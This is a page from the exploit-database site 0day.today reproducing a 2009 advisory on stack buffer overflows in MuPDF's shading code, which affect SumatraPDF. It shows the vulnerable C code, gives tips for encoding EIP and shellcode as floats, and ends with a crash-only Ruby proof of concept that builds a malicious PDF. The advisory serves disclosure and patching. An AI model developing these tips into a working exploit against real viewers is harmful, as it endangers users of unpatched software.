0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
MuPDF pdf_shade4.c Multiple Stack-Based Buffer Overflows
======================================================== MuPDF pdf_shade4.c Multiple Stack-Based Buffer Overflows ======================================================== # Title: MuPDF pdf_shade4.c Multiple Stack-Based Buffer Overflows # CVE-ID: () # OSVDB-ID: () # Author: Christophe Devine # Published: 2009-11-28 # Verified: yes view source print? "MuPDF is a lightweight PDF viewer and toolkit written in portable C". It is used in particular by SumatraPDF which is a small open-source PDF viewer for Windows. MuPDF before commit 20091125231942 did not properly handle /Decode arrays in a shading of type 4 to 7, leading to a stack-based buffer overflow. Version 1.0.1 of SumatraPDF integrates this correction and is no longer vulnerable -- it is recommended to upgrade to this version. In addition, SumatraPDF 1.1 will have DEP enabled permanently on XP/ Vista/7 (through NtSetInformationProcess), as well as being marked ASLR-compatible. Timeline ======== 2009-11-23 MuPDF and SumatraPDF contacted 2009-11-25 fix integrated 2009-11-28 SumatraPDF 1.0.1 released Details ======= The vulnerable code is shown below: float c0[FZ_MAXCOLORS]; float c1[FZ_MAXCOLORS]; ... obj = fz_dictgets(shading, "Decode"); if (fz_isarray(obj)) { ... for (i=0; i < fz_arraylen(obj) / 2; ++i) { c0[i] = fz_toreal(fz_arrayget(obj, i*2+4)); c1[i] = fz_toreal(fz_arrayget(obj, i*2+5)); } } Although SumatraPDF is compiled with /GS, for some reason Visual Studio 2008 failed to flag the vulnerable function. Thus, exploitation is not particularly difficult, although there are a few tricks: * Care must be taken not to overwrite the obj pointer on the stack, as it would lead to a crash. Fortunately, the i variable is overwritten first, so one can simply increment it to skip obj. * The overwritten array handles a bunch of floating point values. So all hexadecimal values (such as the overwritten eip) must be converted into a floting point value, but not using scientific notation because the MuPDf parser cannot handle it. For example, 0x33 will be encoded as 0.000000000000000000000000000000000000000000071 * All 32-bit chunks of the shellcode need to have a valid floating point counterpart: no value must correspond to an IEEE 754 "NaN" (not a number). In practice, this can be easily achieved by inserting NOPs. The origami PDF framework (see http://www.security-labs.org/origami/) may be used to test this vulnerability. The following ruby script creates a PDF with an oversized /Decode array: # MuPDF pdf_loadtype4shade() PoC code (crash only) # authors: Christophe Devine and Guillaume Delugre $: << "sources/parser" require 'parser.rb' include Origami sploit = [ 1234 ] * 250 shader = Graphics::Pattern::Shading::FreeFormTriangleMesh.new shader.ColorSpace = Graphics::Color::Space::DEVICE_RGB shader.BitsPerCoordinate = 24 shader.BitsPerComponent = 16 shader.BitsPerFlag = 8 shader.Decode = sploit page = Page.new.add_shading(:kikoo, shader) page.Contents = ContentStream.new page.Contents.paint_shading(:kikoo) PDF.new.append_page(page).saveas('toto.pdf') How to modify this script to successfully exploit the vulnerability is left as an exercise for the reader ;) Metasploit 3.3 was used for the creation of the shellcode. This poc will not work with other versions of SumatraPDF as it uses a jmp esp in the binary. # 0day.today [2024-07-05] #